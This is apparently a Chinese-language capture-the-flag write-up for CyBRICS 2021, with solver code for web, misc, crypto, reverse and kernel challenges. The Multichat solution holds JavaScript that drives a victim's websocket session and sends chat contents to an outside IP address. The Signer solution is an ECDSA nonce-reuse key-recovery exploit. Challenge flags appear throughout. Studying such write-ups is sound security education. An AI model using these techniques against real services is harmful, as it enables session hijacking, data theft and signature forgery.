CyBRICS 2021-WriteUp

Web

Ad Network

根据要求重定向1337次即可，url在左上角的动图

import?requests

a=requests.session()
a.max_redirects=1338
flag=a.get('http://adnetwork-cybrics2021.ctf.su/adnetwork')
print(flag.text)

Multichat

根据题目描述，向有管理员和技术支持的私密房间内发送特定的字符串，管理员将会在私密房间内把 flag 发出来。

在题目中发现了能够提交url并让技术支持点击url的地方http://multichat-cybrics2021.ctf.su:5000/

对原有的聊天室的 js 函数进行修改，直接进行 websocket 链接并发送Hey, i forgot the flag. Can you remind me?，在获取聊天室内容后，将聊天室内容通过 http 请求发送到自己的服务器上。将修改了的网页挂在自己的服务器上，此时若有人访问该页面，将直接往已连接的了聊天室发送特定的字符串并将聊天室的内容返回到我们自己的服务器上

function?connect()?{
????if?(window["WebSocket"])?{
?????????conn?=?new?WebSocket("ws://multichat-cybrics2021.ctf.su/ws");
?????????conn.onclose?=?function?(evt)?{
?????????????var?item?=?"";
?????????????if?(evt.code?===?1003)?{
????????????????item?=?`Status:?${evt.reason}`;
?????????????}?else?{
????????????????item?=?"Connection?closed.";
?????????????}
?????????????appendLog(item);
?????????};
?????????conn.onopen?=?function?(evt)?{
????????????appendLog("Connected");
????????????conn.send("Hey,?i?forgot?the?flag.?Can?you?remind?me?");
?????????};
?????????conn.onmessage?=?function?(evt)?{
????????????appendLog(evt.data);
????????????request.open('GET','http://120.55.164.48:1234/?a='+evt.data,true);
????????????request.send();
?????????};
????}?else?{
????????appendLog("Your?browser?does?not?support?WebSockets.");
????}
}
????
window.onload?=?function?()?{
????var?room?=?getRandomInt(1000,?9999999999);
????var?msg?=?document.getElementById("msg");
????var?log?=?document.getElementById("log");
????connect();
????document.getElementById("form").onsubmit?=?function?()?{
????????if?(!conn)?{
????????????return?false;
????????}
????????if?(!msg.value)?{
????????????return?false;
????????}
????????conn.send(msg.value);
????????sended_message?=?msg.value;
????????msg.value?=?"";
????????return?false;
?????};

????document.getElementById("room").value?=?room;
?}

把url发过去给技术点，查看服务器的访问记录直接拿flag

Misc

Scanner

游戏一共五关，最后一关得到二维码的 gif，PS 得到

cybrics{N0w_Y0u_4r3_4_c4sh13r_LOL}

CAPTCHA The Flag

使用 stegsolve 连续查看 25 张图中隐写的验证码，输入正确后即可获得 flag

cybrics{a_k33n_Ey3_wi11_sp0T_r1GhT_aw4Y}

Crypto

Signer

'''
@author:?badmonkey
@software:?PyCharm
@file:?exp.py
@time:?2021/7/25?下午1:34
'''
from?pwn?import?*
from?ecdsa?import?ecdsa?as?ec
from?Crypto.Util.number?import?*
from?hashlib?import?md5
ip?=?"109.233.61.10"
port?=?10105
context.log_level?=?"debug"
g?=?ec.generator_192
N?=?g.order()
sh?=?remote(ip,port)
sh.recvuntil(">")
sh.sendline("1")
r1,s1,h1?=?eval(sh.recvall().strip())
sh.close()
sh?=?remote(ip,port)
sh.recvuntil(">")
sh.sendline("1")
r2,s2,h2?=?eval(sh.recvall().strip())
sh.close()
k?=?((h2-h1)*inverse(s2-s1,N))%N
x?=?(inverse(r1,N)*(k*s1-h1))%N
pub?=?ec.Public_key(g,g*x)
pri?=?ec.Private_key(pub,x)
sh?=?remote(ip,port)
sh.recvuntil(">")
sh.sendline("2")
payload?=?sh.recvline().strip()[-19:-2]
m?=?int(md5(payload).hexdigest(),16)
sig?=?pri.sign(m,2333)
sh.sendline("{},{}".format(sig.r,sig.s))
sh.interactive()

Reverse

listing

a1?=?[0xd1,0xd3,0x76,0x23,0x35,0x61,0x9a,0xab]
b1?=?[0x01,0x00,0x03,0x02,0x05,0x04,0x07,0x06]
c1?=?[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]

h1?=?0
for?i?in?range(8):
????c1[i]?=?a1[b1[i]]
for?i?in?range(8):
????h1?+=?c1[i]<<(8*(7-i))
print(hex(h1?^?0xb0b045130550cafe))

a2?=?[0xd5,0xd5,0x23,0x27,0x35,0x65,0x83,0xf8]
b2?=?[0x09,0x08,0x0b,0x0a,0x0c,0x0d,0x0f,0x0e]
c2?=?[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]

for?i?in?range(8):
????c2[i]?=?a2[b2[i]%0x8]
h2?=?0
for?i?in?range(8):
????h2?+=?c2[i]<<(8*(7-i))

print(hex(h2?^?0xb0b045130550cafe))

a3?=?[0xc9,0xd3,0x61,0x27,0x33,0x6c,0x85,0xb9]
b3?=?[0x11,0x10,0x13,0x12,0x15,0x14,0x17,0x16]
c3?=?[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]

for?i?in?range(8):
????c3[i]?=?a3[b3[i]%0x10]
h3?=?0
for?i?in?range(8):
????h3?+=?c3[i]<<(8*(7-i))

print(hex(h3?^?0xb0b045130550cafe))

a4?=?[0xd5,0xd6,0x22,0x71,0x31,0x61,0xcb,0xf8]
b4?=?[0x19,0x18,0x1b,0x1a,0x1c,0x1d,0x1f,0x1e]
c4?=?[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]

h4?=?0
for?i?in?range(8):
????c4[i]?=?a4[b4[i]%0x18]
for?i?in?range(8):
????h4?+=?c4[i]<<(8*(7-i))

print(hex(h4?^?0xb0b045130550cafe))
#[rdi]?=?{h3,h4,h1,h2}?

from?typing?import?*
from?Crypto.Util.number?import?long_to_bytes

result?=?'d1d3762335619aabd5d52327356583f8c9d36127336c85b9d5d622713161cbf8'
k1?=?'feca50051345b0b0feca50051345b0b0feca50051345b0b0feca50051345b0b0'
k2?=?'010003020504070609080b0a0c0d0f0e111013121514171619181b1a1c1d1f1e'

def?bigtolittle(s):
?ss?=?[]
?for?i?in?range(0,?len(s),?2):
??ss?=?[s[i:i+2]]?+?ss
?return?''.join(ss)
?
def?rev(dest,?src2):
?dest_bin?=?bin(int(dest,?16))[2:].zfill(256)
?src2_bin?=?bin(int(src2,?16))[2:].zfill(256)
?src1?=?[0]?*?32
?cnt?=?0
?src2_bin_f?=?src2_bin[:128]
?src2_bin_b?=?src2_bin[128:]
?dest_bin_f?=?dest_bin[:128]
?dest_bin_b?=?dest_bin[128:]
?for?i?in?range(0,?len(src2_bin_f),?8):
??if?src2_bin_f[i]?==?'0':
???idx?=?int(src2_bin_f[4+i:4+i+4],?2)
???src1[idx]?=?dest_bin_f[i:i+8]
??else:
???src1[idx]?=?'?'?*?8
?for?i?in?range(0,?len(src2_bin_b),?8):
??if?src2_bin_b[i]?==?'0':
???idx?=?int(src2_bin_b[4+i:4+i+4],?2)
???src1[idx?+?16]?=?dest_bin_b[i:i+8]
??else:
???src1[idx]?=?'?'?*?8

?return?''.join(src1)
?
result?=?bigtolittle(result)
k1?=?bigtolittle(k1)
k2?=?bigtolittle(k2)
src1?=?rev(result,?k2)
print(src1)

rdi?=?int(k1,?16)?^?int(src1,?2)
#rdi?=?bigtolittle(rdi[2:])
print(long_to_bytes(rdi))

kernel

ssh 连接 dmp 下文件，发现只要满足异或即可

猜测文件位于对应 dev 目录下，构建代码如下：

#include<stdio.h>
#include<stdlib.h>
#include?<sys/types.h>
#include?<sys/stat.h>
#include?<fcntl.h>
#include?<sys/ioctl.h>?
#include?<sys/time.h>

int?main()
{
????????int?fd?=?open("/dev/ioctl",?2);
????????char?s[100]={0};
????????unsigned?int?val?=?0x13373389;
????????struct?timeval?begin;
????????gettimeofday(&begin,?NULL);
????????*(unsigned?int*)s?=?val?^?(unsigned?int)begin.tv_sec;
????????ioctl(fd,?0x5702,?s);
????????puts(s);
}

编译为 elf 文件再将其 ssh 传输到对应目录下远程执行，即可获取 flag